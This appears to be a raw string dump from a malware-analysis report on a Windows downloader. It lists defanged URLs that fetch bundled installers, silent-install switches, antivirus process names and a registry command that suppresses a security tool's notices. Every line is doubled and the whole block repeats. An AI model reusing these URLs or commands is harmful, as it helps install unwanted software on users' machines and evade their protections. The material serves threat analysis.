hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
D:\dream\zmbd
D:\dream\zmbd
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
D:\MM-liao9728.exe
D:\MM-liao9728.exe
D:\MM-liao
D:\MM-liao
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
%Ui,)
%Ui,)
tüV
tüV
1.2.18
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
portuguese-brazilian
portuguese-brazilian
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
Service Pack %d
Service Pack %d
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
Windows ??
Windows ??
Windows Millenium Edition
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98 SP1
Windows 98
Windows 98
Windows 95 OSR2
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
KERNEL32.DLL
KERNEL32.DLL
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
perl.exe
perl.exe
63c37bf685e453975c01269.exe
63c37bf685e453975c01269.exe
cmd.exe
cmd.exe
263c37bf685e453975c01269.exe
263c37bf685e453975c01269.exe
x86 9.0.30729.4148
x86 9.0.30729.4148
c:\%original file name%.exe
c:\%original file name%.exe
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
????????
????????
ADVAPI32.dll
ADVAPI32.dll
AVIFIL32.dll
AVIFIL32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
MSVFW32.dll
MSVFW32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
(*.*)
(*.*)
5.2.1.0
5.2.1.0
%original file name%.exe_856_rwx_00401000_002A7000:
t$(SSh
t$(SSh
~%UVW
~%UVW
.tTPV
.tTPV
FTPjK
FTPjK
FtPj;
FtPj;
F.PjRWj
F.PjRWj
u.WWj
u.WWj
u.VVj
u.VVj
u$SShe
u$SShe
user32.dll
user32.dll
urlmon
urlmon
ole32.dll
ole32.dll
shell32.dll
shell32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
URLDownloadToFileA
URLDownloadToFileA
D:\dream
D:\dream
D:\dream\win1.log
D:\dream\win1.log
QQPCTray.exe
QQPCTray.exe
D:\dream\winky.log
D:\dream\winky.log
360tray.exe
360tray.exe
D:\dream\win2.log
D:\dream\win2.log
D:\dream\winzmbd.log
D:\dream\winzmbd.log
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\UC
%Documents and Settings%\All Users\
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
Windows
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
D:\dream\b2.bat
D:\dream\b2.bat
D:\dream\2k
D:\dream\2k
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
2345pic_k1252705.exe
C:\Users\
C:\Users\
%Documents and Settings%\
%Documents and Settings%\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\1.bat
D:\dream\1.bat
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
D:\dream\ky
D:\dream\ky
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
D:\dream\b.bat
D:\dream\b.bat
D:\dream\2b1
D:\dream\2b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
D:\dream\2b2
D:\dream\2b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
D:\dream\2b3
D:\dream\2b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
D:\dream\2b4
D:\dream\2b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
D:\dream\2b5
D:\dream\2b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
2345explorer_k1252705.exe
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
D:\dream\zy
D:\dream\zy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
D:\dream\lgezy
D:\dream\lgezy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\2.bat
D:\dream\2.bat
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
D:\dream\7b1
D:\dream\7b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
D:\dream\7b2
D:\dream\7b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
D:\dream\7b3
D:\dream\7b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
D:\dream\7b4
D:\dream\7b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
D:\dream\7b5
D:\dream\7b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
D:\dream\uc1
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
D:\dream\uc2
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
D:\dream\uc3
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
D:\dream\uc4
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
D:\dream\uc5
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
D:\dream\uc6
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
D:\dream\lgeuc
D:\dream\lgeuc
D:\dream\3.bat
D:\dream\3.bat
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
D:\dream\7GJ1
D:\dream\7GJ1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
D:\dream\7GJ2
D:\dream\7GJ2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
D:\dream\7GJ3
D:\dream\7GJ3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
D:\dream\7GJ4
D:\dream\7GJ4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
D:\dream\7GJ5
D:\dream\7GJ5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
D:\dream\zmbd
D:\dream\zmbd
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
D:\MM-liao9728.exe
D:\MM-liao9728.exe
D:\MM-liao
D:\MM-liao
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
%Ui,)
%Ui,)
tüV
tüV
1.2.18
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
portuguese-brazilian
portuguese-brazilian
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
Service Pack %d
Service Pack %d
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
Windows ??
Windows ??
Windows Millenium Edition
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98 SP1
Windows 98
Windows 98
Windows 95 OSR2
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
KERNEL32.DLL
KERNEL32.DLL
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
perl.exe
perl.exe
63c37bf685e453975c01269.exe
63c37bf685e453975c01269.exe
cmd.exe
cmd.exe
263c37bf685e453975c01269.exe
263c37bf685e453975c01269.exe
x86 9.0.30729.4148
x86 9.0.30729.4148
c:\%original file name%.exe
c:\%original file name%.exe
